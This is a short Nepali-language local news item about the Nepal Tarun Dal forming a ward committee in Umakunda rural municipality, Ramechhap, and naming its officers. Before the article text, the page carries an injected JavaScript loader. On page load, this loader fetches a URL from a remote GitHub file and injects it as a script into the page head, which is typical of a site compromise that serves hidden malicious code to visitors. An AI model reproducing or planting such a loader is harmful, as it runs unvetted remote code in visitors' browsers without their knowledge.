;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
कात्तिक २३,
रामेछाप । नेपाल तरुण दल उमाकुण्ड गाउँपालिकाले वडा इकाई समिति गठन गरेको छ ।
शनिबार नेपाली कांग्रेसका पूर्व जिल्ला सभापति तथा जिल्ला सदस्य झपट राज भण्डारीको उपस्थितिमा समिति गठन गरेको हो ।
पछिल्लो समयमा सक्रिए रुपमा गाउँपालिकाको ७ वटै वडामा समिति गठन गर्न लागि परेको तरुण दलले वडा नं ७ को भुजिमा बिकास मिलिचाको सभापतितोमा समिति गठन गरेको हो ।
जसमा उप-अध्यक्षमा रविन सुनुवार चयन भएका छन् । भने कोषाअध्यक्षमा राजु सुनुवार चयण भएका छन् । त्यस्तै सचिवमा सोशन सुनुवार चयन भएका छन् । भने सहसचिवमा मीनकुमार सुनुवार चयन भएका छन् । उनीहरुले अहिलेको सरकाले कोरोना भाइरस संक्रमण रोकथामका लागि कुनै पनि काम गर्न नसकेको निशकर्ष पनि निकालेका छन् ।
फेसबुक प्रतिक्रियाहरु